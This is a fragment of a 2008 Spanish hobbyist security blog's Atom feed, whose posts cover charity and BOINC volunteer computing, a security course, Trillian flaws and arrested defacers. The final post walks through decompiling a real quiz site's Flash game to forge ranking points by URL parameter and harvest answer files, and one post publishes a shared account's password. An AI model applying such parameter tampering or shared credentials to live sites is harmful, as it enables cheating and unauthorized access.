type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5462271229734868587'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/07/cambios-en-el-blog.html' title='Cambios en el Blog'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-3575046488613794682</id><published>2008-06-30T02:38:00.002+02:00</published><updated>2008-06-30T02:44:23.513+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Varios'/><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Ser persona - Proyecto Avaaz</title><content type='html'>&lt;a href="http://www.avaaz.org/es/"&gt;Avaaz&lt;/a&gt; es una organización sin ánimo de lucro, que recauda dinero para mandar a países que lo necesiten pero lo más importante, es su poder mediático, ya que a base de firmas con la que la gente apoya a sus proyectos, presionan a los gobiernos directamente e intentan mejorar el problema. En mi opinión, me parece una buena forma de ayudar a los que lo necesitan y que no necesitas mucho tiempo para hacerlo además. Podéis mirar los comunicados de prensa de distintos medios para ver que no parece un timo y todo su trabajo bajo el lema de "El mundo en acción".&lt;br /&gt;Sólo os quitará un pequeño rato de vuestro tiempo y de este modo tal vez consigais ayudar algo si os lo habéis propuesto.&lt;br /&gt;&lt;br /&gt;Página web:&lt;a href="http://www.avaaz.org/es/"&gt; http://www.avaaz.org/es/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-3575046488613794682?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/3575046488613794682/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=3575046488613794682' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3575046488613794682'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3575046488613794682'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/06/ser-persona-proyecto-avaaz.html' title='Ser persona - Proyecto Avaaz'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-3091919768214464955</id><published>2008-06-24T02:08:00.005+02:00</published><updated>2008-06-26T02:39:06.446+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Varios'/><category scheme='http://www.blogger.com/atom/ns#' term='P1mp4m'/><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Ibercivis - Colabora con la ciencia</title><content type='html'>&lt;span style="font-weight: bold;"&gt;Ibercivis&lt;/span&gt; es un proyecto del &lt;a href="http://www.csic.es/index.do"&gt;CSIC&lt;/a&gt; que tiene distintas finalidades, entre esos proyectos están:&lt;br /&gt;  -Fusión (Energía de futuro, energía limpia)&lt;br /&gt;  -Materiales (Patrones de la Naturaleza a usar en neustra vida cotidiana)&lt;br /&gt;  -Proteínas (Fármacos contra el cáncer)&lt;br /&gt;&lt;br /&gt;Para ayudar en este proyecto se pide la colaboración de las personas que tienen un ordenador principlamente y que no te va a tomar mucho tiempo en hacer una serie de pasos para instalar el software necesario.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Pasos a seguir:&lt;/span&gt;&lt;br /&gt;Vayamos a la pagina del BOINC, programa necesario para los cálculos(Win).&lt;br /&gt;&lt;br /&gt;&lt;a href="http://boinc.berkeley.edu/download.php"&gt;http://boinc.berkeley.edu/download.php&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Le damos a descargar y directamente nos lleva a la aplicación a descargar, en mi caso&lt;br /&gt;es esta la versión actual.&lt;br /&gt;&lt;a href="http://boincdl.ssl.berkeley.edu/dl/boinc_5.10.45_windows_intelx86.exe"&gt;http://boincdl.ssl.berkeley.edu/dl/boinc_5.10.45_windows_intelx86.exe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Vamos a intstalar, seguimos los pasos y damos a siguiente hasta llegar aquí.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_L9yjBo3h8BM/SGBAGi44SNI/AAAAAAAAABk/RowLSrkA5Ps/s1600-h/foto1..jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://1.bp.blogspot.com/_L9yjBo3h8BM/SGBAGi44SNI/AAAAAAAAABk/RowLSrkA5Ps/s400/foto1..jpg" alt="" id="BLOGGER_PHOTO_ID_5215238849683802322" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;La &lt;span style="font-style: italic;"&gt;primera&lt;/span&gt; opción sólo para cuando estés en tu sesión.&lt;br /&gt;La &lt;span style="font-style: italic;"&gt;segunda &lt;/span&gt;para todas las sesiones, si quieres que se ayude en cualquiera, recomendable.&lt;br /&gt;La&lt;span style="font-style: italic;"&gt; tercera&lt;/span&gt; para que funcione como servicio, tal vez no muy recomendable ya que te deja sin algunas opciones pero funcionaría automaticamente todo el rato y es una ventaja.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Después:&lt;/span&gt;&lt;br /&gt;Señalamos las dos opciones:&lt;span style="font-style: italic;"&gt; Make BOINC your default screensaver&lt;/span&gt;, si queremos tenerlo como salvapantallas y &lt;span style="font-style: italic;"&gt;Launch BOINC when logging on &lt;/span&gt;para que se ponga na mas te loguees al windows.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Finalmente instalamos.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Después pondrá un puerto a la escucha y podremos trabajar con el programa.&lt;br /&gt;&lt;br /&gt;Para &lt;span style="font-style: italic; font-weight: bold;"&gt;unirse al proyecto&lt;/span&gt; hace falta ir a:&lt;br /&gt;&lt;br /&gt;Herramientas-Unirse a un proyecto&lt;br /&gt;Ponemos la url &lt;a href="http://registro.ibercivis.es/"&gt;http://registro.ibercivis.es/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Si os da pereza tener que andando registrar un usuario ahí os dejo uno, no lo modifiquéis por favor.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Usuario&lt;/span&gt;:&lt;span style="font-style: italic;"&gt;trancek@p1mp4m.es&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Contraseña&lt;/span&gt;:&lt;span style="font-style: italic;"&gt;p1mp4m&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Y listo, ya funciona sólo.&lt;br /&gt;&lt;br /&gt;Esta página es para los que tengan linux y demas S.O.&lt;br /&gt;&lt;a href="http://boinc.berkeley.edu/download_all.php"&gt;http://boinc.berkeley.edu/download_all.php&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;PD:Si poneis el primero o segundo de las 3 opciones que había, agregarlo al regedit en run para que aparezca al iniciarse el pc, si no sabéis dejar un mensaje.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-3091919768214464955?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/3091919768214464955/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=3091919768214464955' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3091919768214464955'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3091919768214464955'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/06/ibercivis-colabora-con-la-ciencia.html' title='Ibercivis - Colabora con la ciencia'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_L9yjBo3h8BM/SGBAGi44SNI/AAAAAAAAABk/RowLSrkA5Ps/s72-c/foto1..jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-7890597966885387153</id><published>2008-06-14T00:41:00.001+02:00</published><updated>2008-06-14T00:43:04.225+02:00</updated><title type='text'>Vacaciones en Italia</title><content type='html'>Pues ale que me voy pa Italia de vacas, quien quiera algo que me deje un correo, y para validar algunos de los retos de yashira.org molesten a los admins jejje, bueno bye byeeee&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-7890597966885387153?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/7890597966885387153/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=7890597966885387153' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/7890597966885387153'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/7890597966885387153'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/06/vacaciones-en-italia.html' title='Vacaciones en Italia'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-7907465234400178787</id><published>2008-06-08T02:18:00.002+02:00</published><updated>2008-06-08T02:24:23.571+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Certificaciones de Seguridad'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>Curso de Seguridad Completo</title><content type='html'>Ya que no tenía sobre que escribir, aprovecho para hacerles publicidad a informatica64. Chema Alonso y los que trabajan con él, además de alguno de S21sec me parece, van a dar un curso bastante completo que tiene pinta de ser bueno. Consta de:&lt;br /&gt;&lt;br /&gt;&lt;span class="Estilo8"&gt;Auditoría de Servidores y Clientes&lt;br /&gt;&lt;/span&gt;&lt;span class="Estilo8"&gt;Auditoria de Aplicaciones Web&lt;/span&gt;&lt;br /&gt;&lt;span class="Estilo8"&gt;Auditoría de Seguridad de Red&lt;br /&gt;&lt;/span&gt;&lt;span class="Estilo8"&gt;Auditoría Wireless, IM, VoIP y VPNs&lt;/span&gt;&lt;br /&gt;&lt;span class="Estilo8"&gt;Análisis Forense&lt;/span&gt;&lt;br /&gt;&lt;span class="Estilo8"&gt;&lt;/span&gt;&lt;br /&gt;Se puede hacer por módulos o completo, el que tiene pinta de ser muy bueno va a ser el de Aplicaciones Web, pero bueno seguro los demás también son buenos.&lt;br /&gt;&lt;br /&gt;El problema tal vez sea la pasta gansa que cuesta, ya que hecha para atrás, pero a quien tenga le merece la pena, aprender en 6 semanas, lo que uno normal puede aprender en 3 meses por su cuenta si se pone a fondo.&lt;br /&gt;&lt;br /&gt;Link:http://www.informatica64.com/cursoseguridad.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-7907465234400178787?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/7907465234400178787/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=7907465234400178787' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/7907465234400178787'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/7907465234400178787'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/06/curso-de-seguridad-completo.html' title='Curso de Seguridad Completo'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-5954810095970097594</id><published>2008-05-23T00:50:00.003+02:00</published><updated>2008-05-23T01:13:13.060+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Trillian muy vulnerable</title><content type='html'>Como ya le comenté hace tiempo a Juan Pablo López cuando descubrió una vulnerabilidad en Trillian poco después de que yo descubriera otra y también le comenté a boken lo mismo, les dije que trillian parecía muy vulnerable y el tiempo lo ha demostrado, está muy mal programado para ser una empresa que parece que tiene buen nivel económico. En cuestión es Cerulean Studios, y al entrar hoy en &lt;a href="http://www.securityfocus.com/"&gt;SecurityFocus&lt;/a&gt;, veo 3 advisories procedentes de&lt;span style="text-decoration: underline;"&gt; &lt;a href="http://www.zerodayinitiative.com"&gt;Zero Day Initiative&lt;/a&gt;&lt;/span&gt;, lo miro a ver que es y me encuentro con el siguiente link donde está toda la información.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://blogs.zdnet.com/security/?p=1168"&gt;Gapping holes in Trillian IM client&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Entre los fallos parece que hay varios fallos remotos sencillitos de explotar, ya veremos con tiempo de que se trata.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-5954810095970097594?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/5954810095970097594/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=5954810095970097594' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5954810095970097594'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5954810095970097594'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/05/trillian-muy-vulnerable.html' title='Trillian muy vulnerable'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-8941408667890407173</id><published>2008-05-22T02:15:00.002+02:00</published><updated>2008-05-22T02:19:34.928+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Diario'/><title type='text'>Fin de instituto</title><content type='html'>Pues ya después de tantos años...y de haber aprobado 4º con 2 aprobadas en el último momento en Septiembre,&lt;br /&gt;1ºBach con 4 en Septiembre y aprobadas 2,&lt;br /&gt;2ºBach con 8 + 2 de primero y aprobadas todas en Junio jiji&lt;br /&gt;&lt;br /&gt;Lo siguiente que toca son unas merecidas vacaciones, un poco de auditoria, un poco de inyecciones, un poco de reversing, un poco de exploiting y un poco de programacion. Pero mucho veranito pa hacer lo que quieraaa!!! :P&lt;br /&gt;&lt;br /&gt;De momento empiezo por un concurso de cracklatinos y luego ya veremos!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-8941408667890407173?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/8941408667890407173/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=8941408667890407173' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/8941408667890407173'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/8941408667890407173'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/05/fin-de-instituto.html' title='Fin de instituto'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-8855075684834611475</id><published>2008-05-17T15:33:00.004+02:00</published><updated>2008-05-17T16:21:08.049+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='defacing'/><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Lo nuevo de DOM-Team detenidos</title><content type='html'>Viendo las noticias a la hora de comer en antena3 derrepente aparece que han detenido a D.O.M Team, a los más nuevos porque otros viejtes que lo dejaron antes, no parece que les haya pasado nada. Me fijo en elmundo.es y se le atribuyen más ataques de lo que han hecho ellos 4 o 5 creo, porque el ranking no guarda ya todo, y que estan en un puesto número 5 de un ranking mundial de especiales(zone-h), pero si se ponen a mirar en dicho ranking, en los especiales hay 33 paginas de las cuales, de la 1 a la 6 como mucho creo que son de los que detuvieron, las otras son de sus antiguos miembros como ArCaX-ATH y otros(no lo mire poco a poco porque a mi no me pagan por hacer articulos aunque a veces se acerquen más a la realidad que los que ganan mucho xD). Y en un ranking total solo estan registrados los del 2008 del gran numero que hay, pero bueno.&lt;br /&gt;Esto ha tenido a coger importancia después de que hicieran el d IU sobretodo, y es que estaban dispuestos a pagar por encontrarlo segun parecia.&lt;br /&gt;La verdad que la mayoria de ataques que hacen o son inyecciones de SQL, o RFI, con saber mucho sobre ello y un poco de como localizar paginas de un mismo servidor, se pueden hacer maravillas y aunque digan que tienen el servidor superprotegido, en linux con un rooteador y en windows con algo para subirte los privilegios, tienes el servidor a tu entera disposicion. Lo que indica la inseguridad que hay en internet, y lo que se deberian gastar en proteger los servidores y no en buscar a gente que aunque les pares, el mismo fallo va a estar ahi y te lo va a saber aprovechar otro. Asi que a auditar más y a llevar a la carcel a menos :P.&lt;br /&gt;Y ya no escribo más que tengo que tengo que estudiar y me da pereza seguir escibiendo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.zone-h.org/component/option,com_attacks/Itemid,44/filter_defacer,D.O.M/page,1"&gt;Link de todos los defaces de D.O.M especiales&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-8855075684834611475?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/8855075684834611475/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=8855075684834611475' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/8855075684834611475'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/8855075684834611475'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/05/lo-nuevo-de-dom-team-detenidos.html' title='Lo nuevo de DOM-Team detenidos'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-217955651319649317</id><published>2008-05-01T13:33:00.005+02:00</published><updated>2008-06-08T18:29:29.549+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades WEB'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>Viejo artículo sobre cutre ataques en flash</title><content type='html'>Bueno aquí os dejo un viejo artículo que hice para la ezine de un amigo, la de cicklow pero que por diversas razones al final no se publicó la ezine, como ya esta paginani existe y queda obsoleta, pues lo publico, decir que actualemtne hay páginas del mismo estilo y con mejore premios que son vulnerables, y que aunque una fue avisada hace más de un año, no la ha arreglado, tendrían que cambiar la web entera xDD, les iba a costar más dinero arreglarla que lo que la gente pueda llevarse en premios.&lt;br /&gt;&lt;br /&gt;Edito: La página esta On de nuevo después de tanto tiempo, no se si lo habrán arreglado, lo miraré cuando no me de pereza registrarme jeje, si alguno lo mira y ve que siguen los fallos que avise al admin jeje :P, no seais malos.&lt;br /&gt; &lt;div style="border-style: none none solid; border-color: -moz-use-text-color -moz-use-text-color rgb(79, 129, 189); border-width: medium medium 1pt; padding: 0cm 0cm 4pt;"&gt;  &lt;p class="MsoTitle"&gt;--------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: center;"&gt;&lt;span style="color: rgb(0, 0, 102);font-size:180%;" &gt;&lt;span style="font-weight: bold;"&gt;Cómo saltarse las aplicaciones Flash para ganar en páginas web&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="color: rgb(51, 51, 255);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;Introducción&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;Hace tiempo ya, un amigo me comentó una página web en la cual se podía hacer trampas y sin comentarme nada más, me puse a investigar a ver que podía ser.&lt;br /&gt;&lt;br /&gt;La página web en cuestión es:&lt;br /&gt;&lt;a href="http://www.futbolreto.com/"&gt;http://www.futbolreto.com/&lt;/a&gt;  -- Actualmente, Fuera de línea.&lt;br /&gt;&lt;br /&gt;Me registré en ella con el nombre de Antonio13 para hacer pruebas, me autentifiqué y me lleva a esta web.&lt;br /&gt;&lt;a href="http://www.futbolreto.com/login/index.php?open=aktiv"&gt;http://www.futbolreto.com/login/index.php?open=aktiv&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);font-size:130%;" &gt;A la carga&lt;/span&gt;&lt;br /&gt;Le damos a jugar y nos lleva a la siguiente:&lt;br /&gt;&lt;a href="http://www.futbolreto.com/login/index.php?open=secure"&gt;http://www.futbolreto.com/login/index.php?open=secure&lt;/a&gt;&lt;br /&gt;Le damos a ver código fuente y nos fijamos en esta parte:&lt;br /&gt;&lt;br /&gt;[&lt;span style="font-weight: bold;"&gt;Código&lt;/span&gt;]&lt;br /&gt;[object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="&lt;a href="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0"&gt;http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0&lt;/a&gt;" width="600" height="400"]&lt;br /&gt;[param name="movie" value="preguntas_v5.swf?sasa=Antonio13&amp;amp;datum=2006-08-11" /]&lt;br /&gt;[param name="quality" value="" /]&lt;br /&gt;[embed src="preguntas_v5.swf?sasa=Antonio13&amp;amp;datum=2006-08-11" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="600" height="400"][/embed]&lt;br /&gt;[/object]&lt;br /&gt;[/&lt;span style="font-weight: bold;"&gt;Código&lt;/span&gt;]&lt;br /&gt;&lt;br /&gt;Esta línea es interesante: &lt;span style="font-weight: bold;"&gt;preguntas_v5.swf?sasa=Antonio13&amp;amp;datum=2006-08-11&lt;/span&gt;, nos muestra como se llama el &lt;span style="font-weight: bold;"&gt;archivo Flash&lt;/span&gt;: preguntas_v5.swf, el &lt;span style="font-weight: bold;"&gt;nombre&lt;/span&gt;: sasa=Antonio13 y la &lt;span style="font-weight: bold;"&gt;fecha&lt;/span&gt;: datum=2006-08-11.&lt;br /&gt;&lt;br /&gt;Bueno metemos en &lt;a href="http://www.futbolreto.com/login/preguntas_v5.swf"&gt;http://www.futbolreto.com/login/preguntas_v5.swf&lt;/a&gt; y observamos que es el flash de antes.&lt;br /&gt;Nos lo bajamos por ejemplo con el flash get u otro acelerador de descargas y lo guardamos. Luego para ver el código de los archivos .swf nos bajamos por ejemplo el flash decompiler 2.90 que es el que tengo yo y lo abrimos con ese programa.&lt;br /&gt;Si nos fijamos a la derecha vemos varias cosas como shape,image,morph,sound,video, etc. A nosotros nos interesa la parte de sprite en la cual hay 84, podemos ir mirando y tenemos que tener en cuenta las variables que tenía la url del código anterior, sasa y datum. Buscamos esas variables y nos paramos en el de sprite 219 ("mama") y nos fijamos en el archivo.&lt;br /&gt;----------&lt;br /&gt;usuario = -root.sasa;&lt;br /&gt;puntos = _root.puntos;&lt;br /&gt;fecha = _root.datum;&lt;br /&gt;Y más abajo:&lt;br /&gt;trace("sasa" + _root.sasa);&lt;br /&gt;trace("puntos" + _root.puntos);&lt;br /&gt;trace("fecha" + _root.datum);&lt;br /&gt;getUrl("guardar.php", "dave", "POST");&lt;br /&gt;----------&lt;br /&gt;&lt;br /&gt;Esas son las variables que tiene en el juego para ir apuntando el usuario, fecha y puntos y la última para guardar todos los datos anteriores, así que ya tenemos todo hecho solo falta hacer una cosa.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);font-size:130%;" &gt;Siendo un crack en el futbol&lt;/span&gt;&lt;br /&gt;Si probamos con la siguiente dirección estas variables y las modificamos a nuestro gusto:&lt;br /&gt;&lt;a href="http://www.futbolreto.com/login/preguntas_v5.swf?sasa=Antonio13&amp;amp;puntos=28000&amp;amp;datum=2006-08-11"&gt;http://www.futbolreto.com/login/preguntas_v5.swf?sasa=Antonio13&amp;amp;puntos=28000&amp;amp;datum=2006-08-11&lt;/a&gt;&lt;br /&gt;Al ir a esa dirección nos sale para jugar, cogemos cualquier categoría y le damos a responder sin marcar nada y dirá que perdimos, pero como somos unos expertos en el fútbol, como se aprecia en nuestros puntos "acumulados", vamos al ranking y aparece Antonio13 en primer lugar con 28000 puntos, así que podéis modificar eso como más os guste.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Ranking&lt;/span&gt; - &lt;a href="http://www.futbolreto.com/login/index.php?open=rank"&gt;http://www.futbolreto.com/login/index.php?open=rank&lt;/a&gt;&lt;br /&gt;También os podéis ingeniar un programa que haga registros automáticos ya que sabéis como funciona y donde lo guarda, así que eso os lo dejo a vosotros por si queréis probar.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;Viendo las respuestas a las preguntas:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;Bueno, vamos a ver otras cosas interesantes a la vista. En el mismo sprite 219 ("mama"),nos fijamos en estas líneas:&lt;br /&gt;&lt;código&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[Código]&lt;/span&gt;&lt;br /&gt;das = random(_root.npreg) + 1;&lt;br /&gt;Obj1 = new LoadVars();&lt;br /&gt;Obj1.load("./" +_root.ram + "/" + das + ".txt", 0);&lt;br /&gt;Obj1.onload = function ()&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt; titulo = Obj1.pregunta;&lt;br /&gt; rta1 = Obj1.rta1;&lt;br /&gt; rta2 = Obj1.rta2;&lt;br /&gt; rta3 = Obj1.rta3;&lt;br /&gt; rta4 = Obj1.rta4;&lt;br /&gt; soplo = Obj1.soplo;&lt;br /&gt; verdad = Obj1.verd;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[/Código]&lt;/span&gt;&lt;br /&gt;&lt;/código&gt;&lt;br /&gt;Ahora nos fijamos aquí: Obj1.load("./" +_root.ram + "/" + das + ".txt", 0); -- esto quiere decir que en donde actualmente está el .swf, www.futbolreto.com/login , hay una / y carga las categorías que son 5 (_root.ram) y luego otra / y carga el número de preguntas y lo pone como .txt por lo que quedaría así “www.futbolreto.com/login/1/1.txt” y como tiene 5 categorías hasta aquí &lt;a href="http://www.futbolreto.com/login/5/1.txt"&gt;www.futbolreto.com/login/5/1.txt&lt;/a&gt; y lo que es el 1.txt(das) varia hasta muchos números, así que vamos probando y guardamos las respuestas.&lt;br /&gt;Y aquí termina este documento, podréis hacer vosotros vuestras pruebas y si queréis ganar, sin que se note mucho, aunque ya no hay premios porque hace tiempo que mi amigo informó y los quitaron y el fallo siguen sin arreglarlo.&lt;br /&gt;Actualmente hay más páginas con este tipo de vulnerabilidades que muestran información sensible y que hace posible el poder saltarse las reglas.&lt;br /&gt;&lt;br /&gt;Hecho por: Trancek, trancek@p1mp4m.es&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-217955651319649317?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/217955651319649317/comments/default' title='Enviar comentarios'/><link 